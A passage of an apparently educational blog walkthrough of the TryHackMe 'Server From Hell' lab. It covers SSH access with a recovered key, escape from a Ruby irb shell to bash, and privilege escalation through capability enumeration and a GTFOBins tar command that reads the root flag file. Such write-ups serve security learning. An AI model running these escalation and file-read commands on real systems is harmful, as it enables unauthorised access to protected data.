    I tried to ssh into the box using hades private but ssh port was not on 22

    From the results of the scan I searched for ssh with openssh client ( Port 333 )

     

     

    sudo ssh hades@10.10.34.91 -i id_rsa -p 3333



    The Server From Hell TryHackMe Walkthrough


    Welcome to hell. We hope you enjoy your stay!

     

    irb(main):001:0> puts 'hello'
    hello
    => nil
    irb(main):002:0>

     

    Now this irb is interactive ruby shell just like we get in python so in order to get a /bin/bash shell run

     

    exec '/bin/bash'

    whoami

    ls

    cat user.txt



    The Server From Hell TryHackMe Walkthrough


    Privilege Escalation

     

    • After sshing we got some kind of shell (not bash or sh), after searching for irb we get it's a ruby shell 

     

    • we can run system commands by- system("command-here"), we can also spawn bash using -
    • exec "/bin/bash" and can see the user flag -


    • We can see we don't have write permissions, so we can't upload scripts to check for attack vector


    • We have to manually check for ways to privilege escalation -


    1) we don't have password for hades so we can't use commands containing sudo (eg. sudo -l)

    2) we can list files with SUID by - find / -type f -perm /4000 2>>/dev/null (we got a very big list but we don't have a lead)

     


    Now the room gives us a hint about getcap this command tells that which file or binary has capability to access almost anything on the system so run

    3) getcap -r 2>/dev/null (2>/dev/null ,here 2 just redirects Standard output error to null )

    getcap -r / 2>/dev/null


    The Server From Hell TryHackMe Walkthrough

     

     

    Visiting GTFOBINS

    https://gtfobins.github.io/gtfobins/tar/

     

    tar xf /root/root.txt -I '/bin/sh -c "cat 1>&2"'

     

    The Server From Hell TryHackMe Walkthrough

     

     

    Disclaimer



    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-

     

  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.